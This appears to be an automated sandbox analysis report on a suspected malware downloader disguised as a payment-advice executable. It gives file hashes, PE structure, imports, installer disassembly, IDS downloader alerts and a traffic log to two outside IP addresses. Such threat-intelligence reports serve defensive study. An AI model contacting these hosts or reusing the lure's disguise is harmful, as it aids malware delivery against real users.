                                                                                                                                        SSDEEP:768:od51waTQFApCdHNsdUp09xiXes7NAnAC+qFvVdhVMtdubYN/UIC6mTtRzcScEfQt:hA6C9AG+alAKUcyZ9oE
                                                                                                                                        MD5:43A8D782AD3A56D7ECD14E52CAEA0F41
                                                                                                                                        SHA1:FCDFF92EC42BEDC2297AE1ECB3C8A009E9A900BF
                                                                                                                                        SHA-256:06AB90D835D1CCFF3CFD1AE37956891918190037D989B4072B4E7ABD5B5418C6
                                                                                                                                        SHA-512:6EEBAC37056096ED7C0C97EA44A4FEDB7DD54DF826171F5733FF72AE0943C6D156F66CCD8239866180AF8FC7793480EDCCACE317BE58F37BEFB12CA43A390871
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...........................i.......................0..........................................................................................................................!.....m..............-....................................................5..e.~........e............ .................................................U.......0{.........B.....................*.................................................................................j...........y................p.............................................................................................a.................o.............................................K.....~.....(...........................D........t.............................................................[.&...... .............................................................m..............x.......................^...........................B...'.........k.....u................L................................................................T..........
                                                                                                                                        Process:C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):424812
                                                                                                                                        Entropy (8bit):1.2532745203430722
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:zQN1zNkWceUPEvf5mtuQTyT0Vupr6jgDTslr7WSn3Dpbvj33BIUaE6SKCBLnSOXQ:6GkbAmorbpf6nP6e6RlY8R2KNsyB
                                                                                                                                        MD5:A8D5999B820E9BA7EC8AE02AC64BD740
                                                                                                                                        SHA1:162064D1816D6723954401E5FF406FB815B1FF01
                                                                                                                                        SHA-256:F3F32F4EE9A9CF103B9E6876518F46801AA187864024B28DE7F36AB7A1A00B7F
                                                                                                                                        SHA-512:6D4DC54EA8653AF4D088E8B058ED07F25F8E2B92571C688BDEBF32759DA813C34A3D5B9BCB1095619C67B5797B2881B2F227B8EA592BDCCB3870B1E8A40E1312
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......2.t................................................#................................(.................................C..(..................$.........................................................y................................................................................[...x.........................>................W.....................................................T....a........................................................H..................u...p.....!.............................................................................................q.....H.........l..K...............`..........R........................f..............................................................+......\.................V......................o.....C.....}...........l..........&............0........ ..n.......O....*.............q............|............................*.........................._....9.......3....I.........G..............................................................
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                        Entropy (8bit):7.656957338635434
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        File size:833'904 bytes
                                                                                                                                        MD5:a7071c7cf3999b13607413c36e8d5418
                                                                                                                                        SHA1:a4d955d14cfb368d93bc7083214b01dec4c90f2b
                                                                                                                                        SHA256:4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
                                                                                                                                        SHA512:4680f4794735608e5594b72ed7c84e9f1af90119d76d541d3d4f27f188a1546e01d3a556d32319da58021ad886f03d67b0deae43e45b6d706b242287f9fe61ed
                                                                                                                                        SSDEEP:24576:/vYV0HT73uF4hi1qCCeFc2QCJgGNXk01vDxPVv7c:YOzaK6VcS5xhDxK
                                                                                                                                        TLSH:6A051282F5D4A16FF45284319142ED76DD6364303B6C595F77F77B2E9820282EB3822E
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                                                        Icon Hash:4975784d4f49613b
                                                                                                                                        Entrypoint:0x40335a
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:CN=Graculus, O=Graculus, L=Moras, C=FR
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 06/05/2024 08:06:23 06/05/2027 08:06:23
                                                                                                                                        Subject Chain
                                                                                                                                        • CN=Graculus, O=Graculus, L=Moras, C=FR
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:009B6F199CD8EB1E40CA9C929DFF6C44
                                                                                                                                        Thumbprint SHA-1:0D47AEA68183F802C3457A0DC7C4EB45B00BD110
                                                                                                                                        Thumbprint SHA-256:99AD5764C91C1F5B205F46D09E160250AA309E332F0DB1CCE79275E57B57C244
                                                                                                                                        Serial:40602E8BAA71E676C5E0E341DF92F31F789140A8
                                                                                                                                        Instruction
                                                                                                                                        sub esp, 000002D4h
                                                                                                                                        push ebx
                                                                                                                                        push ebp
                                                                                                                                        push esi
                                                                                                                                        push edi
                                                                                                                                        push 00000020h
                                                                                                                                        xor ebp, ebp
                                                                                                                                        pop esi
                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                        mov dword ptr [esp+10h], 00409230h
                                                                                                                                        mov dword ptr [esp+1Ch], ebp
                                                                                                                                        call dword ptr [00407034h]
                                                                                                                                        push 00008001h
                                                                                                                                        call dword ptr [004070BCh]
                                                                                                                                        push ebp
                                                                                                                                        call dword ptr [004072ACh]
                                                                                                                                        push 00000008h
                                                                                                                                        mov dword ptr [00429298h], eax
                                                                                                                                        call 00007FD974B4CE3Ch
                                                                                                                                        mov dword ptr [004291E4h], eax
                                                                                                                                        push ebp
                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                        push 000002B4h
                                                                                                                                        push eax
                                                                                                                                        push ebp
                                                                                                                                        push 00420690h
                                                                                                                                        call dword ptr [0040717Ch]
                                                                                                                                        push 0040937Ch
                                                                                                                                        push 004281E0h
                                                                                                                                        call 00007FD974B4CAA7h
                                                                                                                                        call dword ptr [00407134h]
                                                                                                                                        mov ebx, 00434000h
                                                                                                                                        push eax
                                                                                                                                        push ebx
                                                                                                                                        call 00007FD974B4CA95h
                                                                                                                                        push ebp
                                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                                        cmp word ptr [00434000h], 0022h
                                                                                                                                        mov dword ptr [004291E0h], eax
                                                                                                                                        mov eax, ebx
                                                                                                                                        jne 00007FD974B49F8Ah
                                                                                                                                        push 00000022h
                                                                                                                                        mov eax, 00434002h
                                                                                                                                        pop esi
                                                                                                                                        push esi
                                                                                                                                        push eax
                                                                                                                                        call 00007FD974B4C4E6h
                                                                                                                                        push eax
                                                                                                                                        call dword ptr [00407240h]
                                                                                                                                        mov dword ptr [esp+18h], eax
                                                                                                                                        jmp 00007FD974B4A04Eh
                                                                                                                                        push 00000020h
                                                                                                                                        pop edx
                                                                                                                                        cmp cx, dx
                                                                                                                                        jne 00007FD974B49F89h
                                                                                                                                        inc eax
                                                                                                                                        inc eax
                                                                                                                                        cmp word ptr [eax], dx
                                                                                                                                        je 00007FD974B49F7Bh
                                                                                                                                        add word ptr [eax], 0000h
                                                                                                                                        Programming Language:
                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x28c48.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xc97b00x21c0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .ndata0x2a0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rsrc0x530000x28c480x28e0059d6061d9f9f5498351e74e1e9b8c526False0.4770761659021407data5.198121069162778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_BITMAP0x534000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                        RT_ICON0x537680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.4562433455577901
                                                                                                                                        RT_ICON0x63f900x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.4870191297035947
                                                                                                                                        RT_ICON0x6d4380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5106746765249538
                                                                                                                                        RT_ICON0x728c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5217879074161549
                                                                                                                                        RT_ICON0x76ae80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.5518672199170125
                                                                                                                                        RT_ICON0x790900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.6116322701688556
                                                                                                                                        RT_ICON0x7a1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.6635245901639344
                                                                                                                                        RT_ICON0x7aac00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.7340425531914894
                                                                                                                                        RT_DIALOG0x7af280x144dataEnglishUnited States0.5216049382716049
                                                                                                                                        RT_DIALOG0x7b0700x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                        RT_DIALOG0x7b1b00x120dataEnglishUnited States0.5173611111111112
                                                                                                                                        RT_DIALOG0x7b2d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                        RT_DIALOG0x7b3f00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                        RT_DIALOG0x7b4b80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                        RT_GROUP_ICON0x7b5180x76dataEnglishUnited States0.7542372881355932
                                                                                                                                        RT_VERSION0x7b5900x3acdataEnglishUnited States0.4521276595744681
                                                                                                                                        RT_MANIFEST0x7b9400x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                                        DLLImport
                                                                                                                                        KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States
                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                        2024-11-16T16:51:16.029541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551066158.101.44.24280TCP
                                                                                                                                        2024-11-16T16:51:17.326339+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551066158.101.44.24280TCP
                                                                                                                                        2024-11-16T16:51:18.035886+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551068188.114.97.3443TCP
                                                                                                                                        2024-11-16T16:51:18.732541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551069158.101.44.24280TCP
                                                                                                                                        2024-11-16T16:51:20.955066+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551072188.114.97.3443TCP
                                                                                                                                        2024-11-16T16:51:22.783425+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551074188.114.97.3443TCP
                                                                                                                                        2024-11-16T16:51:24.205191+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551076188.114.97.3443TCP
                                                                                                                                        2024-11-16T16:51:25.870768+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551078188.114.97.3443TCP
                                                                                                                                        2024-11-16T16:51:28.771956+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.551082188.114.97.3443TCP
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 16, 2024 16:51:15.181293964 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:15.186234951 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:15.186316967 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:15.186537027 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:15.191307068 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:15.831510067 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:15.835869074 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:15.840840101 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:15.983059883 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.029541016 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:16.310859919 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.310882092 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.310965061 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.314225912 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.314241886 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.924494982 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.924592018 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.928442955 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.928473949 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.928968906 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.933105946 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:16.979332924 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.119944096 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.120007992 CET44351067188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.120271921 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.127296925 CET51067443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.133250952 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:17.139435053 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.281337023 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.284463882 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.284559011 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.284638882 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.284912109 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.284949064 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.326339006 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:17.890126944 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:17.895359039 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:17.895445108 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.035876989 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.035962105 CET44351068188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.036030054 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:18.036473989 CET51068443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:18.039686918 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:18.040797949 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:18.045103073 CET8051066158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.045891047 CET8051069158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.045960903 CET5106680192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:18.045985937 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:18.046087027 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:18.050954103 CET8051069158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.684346914 CET8051069158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.685909986 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:18.686011076 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.686175108 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:18.686533928 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:18.686615944 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:18.732541084 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:19.309258938 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:19.310945988 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:19.311028957 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:19.460295916 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:19.460468054 CET44351070188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:19.460644960 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:19.460936069 CET51070443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:19.465367079 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:19.470397949 CET8051071158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:19.470498085 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:19.470623016 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:19.475747108 CET8051071158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.201165915 CET8051071158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.202604055 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.202656031 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.202732086 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.202986002 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.203002930 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.248157978 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.815850973 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.817601919 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.817652941 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.955096960 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.955262899 CET44351072188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.955333948 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.955760002 CET51072443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:20.959542990 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.960616112 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.964756966 CET8051071158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.964827061 CET5107180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.965456963 CET8051073158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:20.965536118 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.965598106 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:20.970380068 CET8051073158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:21.615936041 CET8051073158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:21.617311954 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:21.617410898 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:21.617522955 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:21.617826939 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:21.617851973 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:21.670039892 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.469273090 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.506067038 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:22.506160975 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.783333063 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.783505917 CET44351074188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.783601999 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:22.784121990 CET51074443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:22.791536093 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.792325020 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.798141003 CET8051073158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.798211098 CET5107380192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.798717022 CET8051075158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:22.798778057 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.802042961 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:22.806941032 CET8051075158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:23.446093082 CET8051075158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:23.447832108 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:23.447923899 CET44351076188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:23.448040962 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:23.448363066 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:23.448411942 CET44351076188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:23.498147964 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.051137924 CET44351076188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:24.053325891 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:24.053414106 CET44351076188.114.97.3192.168.2.5
